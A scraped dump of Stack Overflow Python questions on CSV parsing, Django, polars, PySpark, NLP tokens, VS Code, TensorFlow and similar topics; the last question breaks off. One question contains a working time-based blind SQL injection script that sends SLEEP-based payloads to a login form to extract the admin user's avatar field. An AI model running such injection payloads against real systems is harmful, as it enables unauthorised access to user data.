2023-05-21 20:07:52
| 0
| 303
|
BorangeOrange1337
|
76,301,694
| 6,223,346
|
TypeError - read csv functionality
|
<p>I am getting a Type error when reading a csv file with a bell character as a separator. I don't want to use the pandas and need to utilize the csv libraries for this issue.</p>
<p>Sample header:</p>
<pre><code>["header1", "header2", "header3"]
</code></pre>
<p>Data types</p>
<pre><code>[integer, string, integer]
</code></pre>
<p>Sample data:</p>
<pre><code>"2198"^G"data"^G"x"
"2199"^G"data2"^G"y"
"2198"^G"data3"^G"z"
</code></pre>
<p>Sample code</p>
<pre><code>def main():
columns = ['col1', 'col2', 'col3']
try:
csv_dict_list = []
with open("bell.csv", "r") as file:
reader = csv.DictReader(file, delimiter=r'\a', quoting=csv.QUOTE_ALL, skipinitialspace=True, fieldnames=columns)
for row in reader:
print(row)
csv_dict_list.append(row)
except Exception as e:
raise Exception("Unable to read file: %s" % e)
</code></pre>
<p>I get this error -</p>
<pre><code>TypeError: "delimiter" must be a 1-character string
</code></pre>
<p>Bell character reference - <a href="https://www.asciihex.com/character/control/7/0x07/bel-bell-alert" rel="nofollow noreferrer">https://www.asciihex.com/character/control/7/0x07/bel-bell-alert</a></p>
|
<python><python-3.x><csv><delimiter><csvreader>
|
2023-05-21 19:59:11
| 1
| 613
|
Harish
|
76,301,661
| 13,630,719
|
How to render different UI contexts in a loop within a Django project?
|
<p>Suppose I have the following code:</p>
<pre><code>async def home(request):
if request.method == "POST":
number = "3"
context = {"number": number}
return render(request, 'home/home.html', context)
</code></pre>
<p>I want to have a website that returns different values of the context "3", "2", "1" at the beginning of a game. It would be in a loop similar to this:</p>
<pre><code>async def home(request):
if request.method == "POST":
number = 3
while int(number) < 1:
context = {"number": str(number)}
render(request, 'home/home.html', context)
time.sleep(1)
number -= 1
</code></pre>
<p>The problem here is that I would think I'd need to return <code>render(request, 'home/home.html', context)</code>. But If I return that then I'll break the while loop. How can I then iterate through the values I'd like, and change the UI as required without breaking the loop?</p>
<p>Any advice would be appreciated</p>
|
<python><django><loops><render>
|
2023-05-21 19:50:37
| 0
| 1,342
|
ENV
|
76,301,530
| 10,266,059
|
What is os.Mapping and why isn't it in the os documentation?
|
<p>I am learning python and while using <code>dir()</code> to examine the <code>os</code> module I found an entry called <code>Mapping</code>. I tried to examine it:</p>
<pre><code>Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> type(os.Mapping)
<class 'abc.ABCMeta'>
>>> help(os.Mapping)
Help on class Mapping in module collections.abc:
class Mapping(Collection)
| A Mapping is a generic container for associating key/value
| pairs.
</code></pre>
<p>I searched for "os.Mapping" on the python docs site but no luck: <a href="https://docs.python.org/3/search.html?q=os.Mapping&check_keywords=yes&area=default" rel="nofollow noreferrer">https://docs.python.org/3/search.html?q=os.Mapping&check_keywords=yes&area=default</a></p>
<p>Why does the help say Mapping is in module collections but <code>dir(os)</code> shows it is in module <code>os</code>?</p>
<pre><code>[... 'Mapping', ...]
</code></pre>
<p>I also looked on <a href="https://docs.python.org/3/library/collections.html" rel="nofollow noreferrer">https://docs.python.org/3/library/collections.html</a> but there is nothing called "Mapping" there.</p>
|
<python>
|
2023-05-21 19:15:44
| 1
| 1,676
|
Aleksey Tsalolikhin
|
76,301,422
| 9,542,989
|
Import Classes from Modules of Python Package to __init__
|
<p>In the Python package that I am working on there is a sub-package within it which contains a bunch of modules. Each module consists of a class.</p>
<p>Now, this package is meant to be extensible and there can be new modules introduced anytime. Similar to the existing modules, any new module introduced will also consist of their own class.</p>
<p>I want all of the classes in these modules to be imported to the <strong>init</strong> file of the sub-package.</p>
<p>Is there a way that I can do this automatically, so that I don't have to change the <strong>init</strong> file each time a new module is created?</p>
|
<python><python-packaging>
|
2023-05-21 18:48:29
| 1
| 2,115
|
Minura Punchihewa
|
76,301,261
| 8,702,633
|
dotenv install error: "error: invalid command 'dist_info'"
|
<p>I'm getting an error installing dotenv on macOS:</p>
<pre><code>Collecting dotenv
Using cached dotenv-0.0.5.tar.gz (2.4 kB)
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... error
error: subprocess-exited-with-error
× pip subprocess to install backend dependencies did not run successfully.
│ exit code: 1
╰─> [29 lines of output]
Collecting distribute
Using cached distribute-0.7.3.zip (145 kB)
Installing build dependencies: started
Installing build dependencies: finished with status 'done'
Getting requirements to build wheel: started
Getting requirements to build wheel: finished with status 'done'
Preparing metadata (pyproject.toml): started
Preparing metadata (pyproject.toml): finished with status 'error'
error: subprocess-exited-with-error
× Preparing metadata (pyproject.toml) did not run successfully.
│ exit code: 1
╰─> [6 lines of output]
usage: setup.py [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: setup.py --help [cmd1 cmd2 ...]
or: setup.py --help-commands
or: setup.py cmd --help
error: invalid command 'dist_info'
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed
× Encountered error while generating package metadata.
╰─> See above for output.
note: This is an issue with the package mentioned above, not pip.
hint: See above for details.
[end of output]
note: This error originates from a subprocess, and is likely not a problem with pip.
error: subprocess-exited-with-error
× pip subprocess to install backend dependencies did not run successfully.
│ exit code: 1
╰─> See above for output.
note: This error originates from a subprocess, and is likely not a problem with pip.
</code></pre>
<p>Someone said in another thread that it needs QT5. I tried to install QT5 but still facing the error.</p>
|
<python><pip><dotenv>
|
2023-05-21 18:04:53
| 3
| 331
|
Max
|
76,301,208
| 4,019,495
|
VS Code Python: unable to get auto import suggestions
|
<p>I'm using VS Code on Linux. <a href="https://code.visualstudio.com/docs/python/editing#_enable-auto-imports" rel="nofollow noreferrer">Auto imports</a> do not work for me.</p>
<p>Here is a screenshot:</p>
<p><a href="https://i.sstatic.net/ipQKe.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ipQKe.png" alt="Screenshot showing "No code actions available" on "math"" /></a></p>
<p>However, if I <code>import math</code>, VS Code is able to give suggestions when I type <code>math.</code>. This is my user settings.json:</p>
<pre class="lang-json prettyprint-override"><code>{
"python.linting.pylintEnabled": false,
"python.linting.flake8Enabled": false,
"python.analysis.indexing": true,
"python.analysis.autoImportCompletions": true,
"python.testing.pytestArgs": [
"-vv"
],
"python.testing.pytestEnabled": true,
"window.zoomLevel": -2
}
</code></pre>
<p>I don't have anything in my workspace settings.json. I've installed the ms-python and ms-pyright extensions. Everything should be a relatively recent version. Any ideas?</p>
|
<python><visual-studio-code>
|
2023-05-21 17:52:53
| 1
| 835
|
extremeaxe5
|
76,301,163
| 12,908,701
|
How to use choices of a Select field of a form, when defined in the view in Django?
|
<p>I have an issue with a form with a Select input. This input is used to select a user in a list. The list should only contain user from the group currently used.</p>
<p>I found a solution, however I am not completely sure of what am I doing in the form definition (I do not fully understand how works the <code>def __init__</code> part). And of course, my code is not working : I obtain the right form, with the choices I need, however if a submit data, it's not saved in the database.</p>
<p>I have been able to check if the form is valid (it is not), the error is the following :</p>
<blockquote>
<p>Category - Select a valid choice. That choice is not one of the available choices.</p>
</blockquote>
<p>(I have the same error for the user field). I can't find my way in this, so if you can help, would be very appreciated!</p>
<p>My models:</p>
<pre><code>class Group(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class User(AbstractUser):
groups = models.ManyToManyField(Group)
current_group = models.ForeignKey(Group, on_delete=models.SET_NULL,blank = True , null = True, related_name="current_group")
class Category(models.Model):
name = models.CharField(max_length=100)
groups = models.ManyToManyField(Group)
def __str__(self):
return self.name
class Expanses(models.Model):
date = models.DateTimeField()
amount = models.DecimalField(decimal_places=2, max_digits=12)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
group = models.ForeignKey(Group, on_delete=models.CASCADE)
comment = models.CharField(max_length=500)
def __str__(self):
return self.amount
</code></pre>
<p>My form:</p>
<pre><code>class CreateExpanseForm(forms.ModelForm):
class Meta:
model = Expanses
fields = ['date', 'amount', 'category', 'user','comment']
widgets={'date':DateInput(attrs={'placeholder':'Date', 'class':'form-input', 'type':'date'}),
'amount':TextInput(attrs={'placeholder':'Amount', 'class':'form-input', 'type':'text'}),
'category':Select(attrs={'placeholder':'Category', 'class':'form-select', 'type':'text'}),
'user':Select(attrs={'placeholder':'user', 'class':'form-select', 'type':'text'}),
'comment':TextInput(attrs={'placeholder':'comment', 'class':'form-input', 'type':'text'}),}
def __init__(self, *args, **kwargs):
user_choices = kwargs.pop('user_choices', None)
category_choices = kwargs.pop('category_choices', None)
super().__init__(*args, **kwargs)
if user_choices:
self.fields['user'].choices = user_choices
if category_choices:
self.fields['category'].choices = category_choices
</code></pre>
<p>My view:</p>
<pre><code>def SummaryView(request):
createExpanseForm = CreateExpanseForm(user_choices = [(user.username, user.username) for user in request.user.current_group.user_set.all()],
category_choices = [(category.name, category.name) for category in request.user.current_group.category_set.all()])
if request.method == "POST":
if 'createExpanse' in request.POST:
createExpanseForm = CreateExpanseForm(user_choices = [(user.username, user.username) for user in request.user.current_group.user_set.all()],
category_choices = [(category.name, category.name) for category in request.user.current_group.category_set.all()],
data=request.POST)
if createExpanseForm.is_valid():
expanse = createExpanseForm.save()
if expanse is not None:
expanse.group = request.user.current_group
expanse.save()
else:
messages.success(request, "Error!")
context = {'createExpanseForm':createExpanseForm}
return render(request, 'app/summary.html', context)
</code></pre>
|
<python><django><forms><selectinput>
|
2023-05-21 17:41:06
| 1
| 563
|
Francois51
|
76,301,107
| 20,443,528
|
How to sort a model's objects if the model has foreign key relations and I have to sort based on the properties of the foreign model?
|
<p>How to sort a model's objects if the model has foreign key relations and I have to sort based on the properties of the foreign model?</p>
<p>Here is my model</p>
<pre><code>class Room(models.Model):
class Meta:
ordering = ['number']
number = models.PositiveSmallIntegerField(
validators=[MaxValueValidator(550), MinValueValidator(1)],
primary_key=True
)
CATEGORIES = (
('Regular', 'Regular'),
('Executive', 'Executive'),
('Deluxe', 'Deluxe'),
)
category = models.CharField(max_length=9, choices=CATEGORIES, default='Regular')
CAPACITY = (
(1, '1'),
(2, '2'),
(3, '3'),
(4, '4'),
)
capacity = models.PositiveSmallIntegerField(
choices=CAPACITY, default=2
)
advance = models.PositiveSmallIntegerField(default=10)
manager = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE
)
class TimeSlot(models.Model):
class Meta:
ordering = ['available_from']
room = models.ForeignKey(Room, on_delete=models.CASCADE)
available_from = models.TimeField()
available_till = models.TimeField()
class Booking(models.Model):
customer = models.ForeignKey(User, on_delete=models.CASCADE)
check_in_date = models.DateField()
timeslot = models.ForeignKey(TimeSlot, on_delete=models.CASCADE)
</code></pre>
<p>Suppose I have to sort the objects of the <code>Booking</code> model on the basis of <code>available_from</code> or <code>number</code> how will I do it?</p>
|
<python><django><django-models><django-queryset>
|
2023-05-21 17:25:47
| 1
| 331
|
Anshul Gupta
|
76,301,087
| 4,451,315
|
polars: list to columns, without `get`
|
<p>Say I have:</p>
<pre class="lang-py prettyprint-override"><code>In [1]: df = pl.DataFrame({'a': [[1,2], [3,4]]})
In [2]: df
Out[2]:
shape: (2, 1)
┌───────────┐
│ a │
│ --- │
│ list[i64] │
╞═══════════╡
│ [1, 2] │
│ [3, 4] │
└───────────┘
</code></pre>
<p>I know that all elements of <code>'a'</code> are lists of the same length.</p>
<p>I can do:</p>
<pre class="lang-py prettyprint-override"><code>In [10]: df.select(pl.col('a').list.get(i).alias(f'a_{i}') for i in range(2))
Out[10]:
shape: (2, 2)
┌─────┬─────┐
│ a_0 ┆ a_1 │
│ --- ┆ --- │
│ i64 ┆ i64 │
╞═════╪═════╡
│ 1 ┆ 2 │
│ 3 ┆ 4 │
└─────┴─────┘
</code></pre>
<p>but this involved hard-coding <code>2</code>.</p>
<p>Is there a way to do this without hard-coding the <code>2</code>? I may not know in advance how many elements there in the lists (I just know that they all have the same number of elements)</p>
|
<python><dataframe><python-polars>
|
2023-05-21 17:21:17
| 1
| 11,062
|
ignoring_gravity
|
76,300,991
| 6,640,504
|
How to assign a constant value to all records of the pyspark dataframe window
|
<p>I have a pyspark dataframe like this:</p>
<pre><code>+-------+-------+
| level | value |
+-------+-------+
| 1 | 4 |
| 1 | 5 |
| 2 | 2 |
| 2 | 6 |
| 2 | 3 |
+-------+-------+
</code></pre>
<p>I have to create a value for every group in <strong>level</strong> column and save this in <strong>lable</strong> column. This value for every group must be unique, so I use <strong>ObjectId Mongo</strong> function to create that. Next dataframe is like this:</p>
<pre><code>+-------+--------+-------+
| level | lable| value |
+-------+--------+-------+
| 1 | bb76 | 4 |
| 1 | bb76 | 5 |
| 2 | cv86 | 2 |
| 2 | cv86 | 6 |
| 2 | cv86 | 3 |
+-------+--------+-------+
</code></pre>
<p>Then I must create a dataframe as following:</p>
<pre><code>+-------+-------+
| lable | value |
+-------+-------+
| bb76 | 9 |
| cv86 | 11 |
+-------+-------+
</code></pre>
<p>To do that, first I used <code>spark groupby</code>:</p>
<pre><code> def create_objectid():
a = str(ObjectId())
return a
def add_lable(df):
df = df.cache()
df.count()
grouped_df = df.groupby('level').agg(sum(df.value).alias('temp'))
grouped_df = grouped_df.withColumnRenamed('level', 'level_temp')
grouped_df = grouped_df.withColumn('lable', udf_create_objectid())
grouped_df = grouped_df.drop('temp')
df = df.join(grouped_df.select('level_temp','lable'), col('level') == col('level_temp'), how="left").drop(grouped_df.level_temp)
return df
</code></pre>
<p>When I used the above code on <em>spark dataframe</em> with 2 millions records, it takes about <code>155</code> seconds to finish.
I searched and found that <code>spark window</code> has better performance. Then, I changed the last function to this one. Because <code>pandas_udf</code> needs <code>arg</code>, so I just pass one and print it:</p>
<pre><code>@f.pandas_udf("string")
def create_objectid_on_window(v: pd.Series) -> str:
print('v:',v)
return str(ObjectId())
def add_lable(df):
w = Window.partitionBy('level')
df = df.withColumn('lable', create_objectid_on_window('level').over(w))
return df
</code></pre>
<p>But after running the program, I receive this error:</p>
<pre><code>AttributeError: 'NoneType' object has no attribute '_jvm'
</code></pre>
<h2>Update</h2>
<p>I read this question and answers; I do know this is because of the pandas UDF function. How can I change it?</p>
|
<python><apache-spark><pyspark>
|
2023-05-21 16:53:39
| 0
| 1,172
|
M_Gh
|
76,300,983
| 8,235,224
|
How to interpret word2vec train output?
|
<p>Running the code snippet below report an output (3, 60). I wonder what exactly it is reporting?</p>
<p>The code is reproducible..just copy into a notebook cell and run.</p>
<pre><code>from gensim.models import Word2Vec
sent = [['I', 'love', 'cats'], ['Dogs', 'are', 'friendly']]
w2v_model = Word2Vec(sentences=sent, vector_size=100, window=7, min_count=1,sg=1)
w2v_model.train(sent, total_examples=len(sent), epochs=10)
</code></pre>
<p>(3, 60)</p>
|
<python><nlp><word2vec>
|
2023-05-21 16:52:10
| 1
| 2,943
|
Regi Mathew
|
76,300,901
| 6,258,636
|
Create a Python list with every combination of '+', '-', '*', and '/' strings
|
<p>I am trying to build a 2d list of test cases that contains all the possible cases ('+', '-', '*', '/') like this:</p>
<pre><code>[('+', '+', '+', '+'),
('+', '+', '+', '-'),
('+', '+', '+', '/'),
('+', '+', '+', '*'),
('+', '+', '-', '-'),
('+', '+', '-', '/'),
('+', '+', '-', '*'),
('+', '+', '/', '/'),
('+', '+', '/', '*'),
('+', '+', '*', '*'),
('+', '-', '-', '-'),
('+', '-', '-', '/'),
('+', '-', '-', '*'),
('+', '-', '/', '/'),
('+', '-', '/', '*'),
('+', '-', '*', '*'),
('+', '/', '/', '/'),
('+', '/', '/', '*'),
('+', '/', '*', '*'),
('+', '*', '*', '*'),
('-', '-', '-', '-'),
('-', '-', '-', '/'),
('-', '-', '-', '*'),
('-', '-', '/', '/'),
('-', '-', '/', '*'),
('-', '-', '*', '*'),
('-', '/', '/', '/'),
('-', '/', '/', '*'),
('-', '/', '*', '*'),
('-', '*', '*', '*'),
('/', '/', '/', '/'),
('/', '/', '/', '*'),
('/', '/', '*', '*'),
('/', '*', '*', '*'),
('*', '*', '*', '*')]
</code></pre>
<p>I am thinking to create it in a Python list comprehension. I tried:</p>
<pre><code>[[x] * 4 for x in ('+','-','*', '/')]
</code></pre>
<p>but the result is not something I want. Anyone knows how to do it? Thanks.</p>
|
<python>
|
2023-05-21 16:33:47
| 1
| 1,434
|
Ken
|
76,300,464
| 2,876,994
|
How to be more precise calculation elapsed time using python request?
|
<p>I'm trying to simulate a SQLMap exploting a SQL injection Time Based.</p>
<pre><code>resultado = ""
listaCaracteres = string.ascii_letters + string.digits + "._-@/"
delay = 5
tamanhoCampo = 30
for i in range(1,tamanhoCampo+1):
caracterFound = False
for char in listaCaracters:
data = {
"username": f"teste' OR IF((SELECT substring(avatar,{i},1) FROM users WHERE username='admin')='{caracter}',SLEEP({delay}),1)#",
"password": "teste"
}
startTime = time.time()
try:
# print(f"[+] Iniciando Requisição - posição {i} caracter {caracter}")
resp = requests.post(url, headers=headers, cookies=cookies, data=data)
except Exceptions as e:
print(e)
endTime = time.time()
tempoTotal = endTime - startTime
print(f"[*] Pos. {i} {caracter} {tempoTotal}")
if tempoTotal >= delay:
print(f"[+] Caracter encontrado {caracter} {tempoTotal}")
resultado += caracter
caracterEncontrado = True
delay = 5
break
if not caracterEncontrado:
delay += 1
print(f"[*] Caracter não encontrado, aumentando o tempo de resposta para {delay} segundos")
print(resultado)
</code></pre>
<p>Debugging the results</p>
<pre><code>[*] Iniciando o DUMP.
[*] Pos. 1 a 0.41757917404174805
[*] Pos. 1 b 0.42841196060180664
[*] Pos. 1 c 0.42807817459106445
[*] Pos. 1 d 1.420304536819458
[*] Pos. 1 e 0.4183344841003418
[*] Pos. 1 f 0.4205491542816162
[*] Pos. 1 g 0.41797685623168945
[*] Pos. 1 h 0.41671323776245117
[*] Pos. 1 i 0.41751718521118164
[*] Pos. 1 j 0.4145169258117676
[*] Pos. 1 k 0.4157712459564209
[*] Pos. 1 l 0.4163017272949219
[*] Pos. 1 m 0.41348886489868164
[*] Pos. 1 n 0.4273350238800049
[*] Pos. 1 o 0.42464113235473633
[*] Pos. 1 p 0.4265732765197754
[*] Pos. 1 q 0.4321424961090088
[*] Pos. 1 r 0.4281890392303467
[*] Pos. 1 s 0.41872739791870117
[*] Pos. 1 t 0.41807007789611816
[*] Pos. 1 u 4.920653581619263
[*] Pos. 1 v 0.41268229484558105
[*] Pos. 1 w 0.47426342964172363
[*] Pos. 1 x 0.4102909564971924
[*] Pos. 1 y 0.41750526428222656
[*] Pos. 1 z 0.41268014907836914
[*] Pos. 1 A 0.412386417388916
[*] Pos. 1 B 0.4086577892303467
[*] Pos. 1 C 0.41196632385253906
</code></pre>
<p>Pos.1 letter u gives almost 5 seconds, actually 4.9 that's exatcly the first character in avatar field what I'm looking for, each script executation give me 4.9 or more than 5 secs, sometimes this goes into the first condition and not!</p>
<p>So, how to be more accurate calculate this?</p>
|
<python><request><sql-injection><elapsedtime>
|
2023-05-21 14:46:08
| 0
| 1,552
|
Shinomoto Asakura
|
76,300,455
| 5,617,608
|
Welcome emails sent by Frappe framework are missing the port number
|
<p>When using Frappe framework and changing the Nginx port from 80 to 8002 to avoid conflicts, I get broken URLs in all emails sent by the system. The port was changed using <code>bench set-nginx-port 8002</code>. The ports 80 and 8000 are already busy in the VPS.</p>
<p>While I access the system using hostname:port_number, I get all emails as hostname/the-rest-of-url.</p>
<p>The same issue was reported on <a href="https://discuss.frappe.io/t/email-not-sending-correct-url-on-updating-nginx-port/47290/2" rel="nofollow noreferrer">frappe.io</a> and <a href="https://github.com/frappe/erpnext/issues/17044" rel="nofollow noreferrer">GitHub</a>, but it's unclear how to solve it.</p>
<p>How can I solve this? Thank you in advance!</p>
|
<python><nginx><erpnext><frappe>
|
2023-05-21 14:44:23
| 1
| 1,759
|
Esraa Abdelmaksoud
|
76,300,404
| 7,987,455
|
Why is "requests-html" not rendering all HTML content?
|
<p>I am trying to scrape data, but the script is not loading all html content, although I changed the rendering time. Please see the code below:</p>
<pre><code>from requests_html import HTMLSession, AsyncHTMLSession
url = 'https://www.aliexpress.com/w/wholesale-test.html?catId=0&initiative_id=SB_20230516115154&SearchText=test&spm=a2g0o.home.1000002.0'
def create_session(url):
session = HTMLSession()
request = session.get(url)
print("Before ",len(request.html.html),"\n\n")
request.html.render(sleep=5,timeout=20) #Because it is dynamic website, will wait until to load the page
prod = request.html.find('#root > div > div > div.right--container--1WU9aL4.right--hasPadding--52H__oG > div > div.content--container--2dDeH1y > div.list--gallery--34TropR > a:nth-child(1) > div.manhattan--content--1KpBbUi')
print("After ",len(request.html.html),"\n\n")
print("output:",prod)
session.close()
create_session(url)
</code></pre>
<p>When I ran the code for the <strong>first time</strong>, the output was:</p>
<pre><code>Before 55448
After 542927
output: [<Element 'div' class=('manhattan--content--1KpBbUi',)>]
</code></pre>
<p>when I run the program again (<strong>WITHOUT changing anything in the code</strong>) I got:</p>
<pre><code>Before 55448
After 251734
output: []
</code></pre>
<p>and when I changed the sleep time from 5 to 100: <code>request.html.render(sleep=5,timeout=20)</code> to <code>request.html.render(sleep=100,timeout=20)</code>, I also received a similar output:</p>
<pre><code>Before 55448
After 242881
output: []
</code></pre>
<p>It is not rendering all html content</p>
|
<python><web-scraping><beautifulsoup><python-requests><html-rendering>
|
2023-05-21 14:31:50
| 0
| 315
|
Ahmad Abdelbaset
|
76,300,362
| 20,220,485
|
How do you reconcile a list of tuples containing a tokenized string with the original string?
|
<p>I am trying to reconcile <code>idx_tag_token</code>, which is a list of tuples containing a tokenized string and its label and character index, with the original string <code>word_string</code>. I want to output a list of tuples, with each tuple containing an element of the original string if split on whitespace, along with label information from <code>idx_tag_token</code>.</p>
<p>I have written some code that finds a token's associated word in <code>word_string</code> based on the character index. I then create a list of tuples with each of these words and the associated label. This is defined as <code>word_tag_list</code>. However, based on this, I am unsure how to proceeed to create the desired output.</p>
<p>The conditions to update the labels are not complicated, but I can't work out the appropriate system here.</p>
<p>Any assistance would be truly appreciated.</p>
<p>The data:</p>
<pre><code>word_string = "At London, the 12th in February, 1942, and for that that reason Mark's (3) wins, American parts"
idx_tag_token =[(0, 'O', 'At'),
(3, 'GPE-B', 'London'),
(9, 'O', ','),
(11, 'DATE-B', 'the'),
(15, 'DATE-I', '12th'),
(20, 'O', 'in'),
(23, 'DATE-B', 'February'),
(31, 'DATE-I', ','),
(33, 'DATE-I', '1942'),
(37, 'O', ','),
(39, 'O', 'and'),
(43, 'O', 'for'),
(47, 'O', 'that'),
(52, 'O', 'that'),
(57, 'O', 'reason'),
(64, 'PERSON-B', 'Mark'),
(68, 'O', "'s"),
(71, 'O', '('),
(72, 'O', '3'),
(73, 'O', ')'),
(75, 'O', 'wins'),
(79, 'O', ','),
(81, 'NORP-B', 'American'),
(90, 'O', 'parts')]
</code></pre>
<p>My code:</p>
<pre><code>def find_word_from_index(idx, word_string):
words = word_string.split()
current_index = 0
for word in words:
start_index = current_index
end_index = current_index + len(word) - 1
if start_index <= idx <= end_index:
return word
current_index = end_index + 2
return None
word_tag_list = []
for index, tag, _ in idx_tag_token:
word = find_word_from_index(index, word_string)
word_tag_list.append((word, tag))
word_tag_list
</code></pre>
<p>Current output:</p>
<pre><code>[('At', 'O'),
('London,', 'GPE-B'),
('London,', 'O'),
('the', 'DATE-B'),
('12th', 'DATE-I'),
('in', 'O'),
('February,', 'DATE-B'),
('February,', 'DATE-I'),
('1942,', 'DATE-I'),
('1942,', 'O'),
('and', 'O'),
('for', 'O'),
('that', 'O'),
('that', 'O'),
('reason', 'O'),
("Mark's", 'PERSON-B'),
("Mark's", 'O'),
('(3)', 'O'),
('(3)', 'O'),
('(3)', 'O'),
('wins,', 'O'),
('wins,', 'O'),
('American', 'NORP-B'),
('parts', 'O')]
</code></pre>
<p>Desired output:</p>
<pre><code>[('At', 'O'),
('London,', 'GPE-B'),
('the', 'DATE-B'),
('12th', 'DATE-I'),
('in', 'O'),
('February,', 'DATE-B'),
('1942,', 'DATE-I'),
('and', 'O'),
('for', 'O'),
('that', 'O'),
('that', 'O'),
('reason', 'O'),
("Mark's", 'PERSON-B'),
('(3)', 'O'),
('wins,', 'O'),
('American', 'NORP-B'),
('parts', 'O')]
</code></pre>
|
<python><string><indexing><tuples><tokenize>
|
2023-05-21 14:20:24
| 1
| 344
|
doine
|
76,300,306
| 5,838,180
|
How to cross match with python 2 dataframes by (Cartesian) coordinates?
|
<p>I have 2 astronomical catalogues, containing galaxies with their respective sky coordinates (ra, dec). I handle the catalogues as data frames. The catalogs are from different observational surveys and there are some galaxies that appear in both catalogs. I want to cross match these galaxies and put them in a new catalog. How can I do this is with python? I taught there should be some easy way with numpy, pandas, astropy or another package, but I couldn't find a solution? Thx</p>
|
<python><pandas><database><astropy><cross-match>
|
2023-05-21 14:09:07
| 1
| 2,072
|
NeStack
|
76,300,212
| 14,366,549
|
Problems combining tensorflow with huggingGPT transformers on a python project
|
<p>This is my code:</p>
<pre><code>mport os
from dotenv import load_dotenv
from database import create_connection
import mysql.connector
# from user_interface import user_interface
from flask import Flask, request, jsonify
import pandas as pd
import mysql.connector
from transformers import BertTokenizer, TFBertForSequenceClassification
import tensorflow as tf
# Load environment variables from .env file
load_dotenv()
print(tf.__version__)
app = Flask(__name__)
# Get environment variables
host = os.getenv('DB_HOST')
user = os.getenv('DB_USER')
password = os.getenv('DB_PASSWORD')
db_name = os.getenv('DB_NAME')
connection = create_connection(host, user, password, db_name)
# Load the model and tokenizer
# model = TFBertForSequenceClassification.from_pretrained('bert-base-uncased')
model = TFBertForSequenceClassification.from_pretrained('bert-base-uncased')
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
# Define categories
</code></pre>
<p>but when I try to run I always get this error:</p>
<pre><code>Traceback (most recent call last):
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1076, in _get_module
return importlib.import_module("." + module_name, self.__name__)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/Cellar/python@3.11/3.11.3/Frameworks/Python.framework/Versions/3.11/lib/python3.11/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<frozen importlib._bootstrap>", line 1206, in _gcd_import
File "<frozen importlib._bootstrap>", line 1178, in _find_and_load
File "<frozen importlib._bootstrap>", line 1149, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 690, in _load_unlocked
File "<frozen importlib._bootstrap_external>", line 940, in exec_module
File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
File "/opt/homebrew/lib/python3.11/site-packages/transformers/models/bert/modeling_tf_bert.py", line 38, in <module>
from ...modeling_tf_utils import (
File "/opt/homebrew/lib/python3.11/site-packages/transformers/modeling_tf_utils.py", line 70, in <module>
from keras.engine import data_adapter
ModuleNotFoundError: No module named 'keras.engine'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pedrospecter/Downloads/work/cw1/autonomous_ai/main.py", line 9, in <module>
from transformers import BertTokenizer, TFBertForSequenceClassification
File "<frozen importlib._bootstrap>", line 1231, in _handle_fromlist
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1067, in __getattr__
value = getattr(module, name)
^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1066, in __getattr__
module = self._get_module(self._class_to_module[name])
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/opt/homebrew/lib/python3.11/site-packages/transformers/utils/import_utils.py", line 1078, in _get_module
raise RuntimeError(
RuntimeError: Failed to import transformers.models.bert.modeling_tf_bert because of the following error (look up to see its traceback):
No module named 'keras.engine'
</code></pre>
<p>I have installed both transformers and tensorflow using:</p>
<pre><code>pip3 install transformers tensorflow
</code></pre>
<p>I am on a MacBook Pro M2 Max</p>
<p>does anyone have a tip on how can I run this? The code is just the essential until the error shows up, but there is way more code under.</p>
<p>Cheers</p>
|
<python><tensorflow><huggingface-transformers>
|
2023-05-21 13:46:32
| 1
| 433
|
thelittlemaster
|
76,300,143
| 17,835,656
|
why the issuer name is reversed when i get it using python?
|
<p>i have a certificate and when i use python to get the issuer name of the certificate i get the issuer name reversed :</p>
<p>the correct issuer name : <code>CN=PEZEINVOICESCA2-CA,DC=extgazt,DC=gov,DC=local</code></p>
<p>the issuer name that i get : <code>DC=local,DC=gov,DC=extgazt,CN=PEZEINVOICESCA2-CA</code></p>
<p>this is the code that i use to get the issuer name :</p>
<pre class="lang-py prettyprint-override"><code>import cryptography.x509
your_Certificate = open("cert.txt","rb")
Certificate = your_Certificate.read().decode()
your_Certificate.close()
the_certificate = cryptography.x509.load_pem_x509_certificate("-----BEGIN CERTIFICATE-----\n{}\n-----END CERTIFICATE-----".format(Certificate).encode())
issuer_name = (str(the_certificate.issuer).split("(")[-1].split(")")[0])
print(issuer_name)
</code></pre>
<p>and this is the website that i get the correct issuer name from : <code>https://certlogik.com/</code></p>
<p>this is my certificate :</p>
<blockquote>
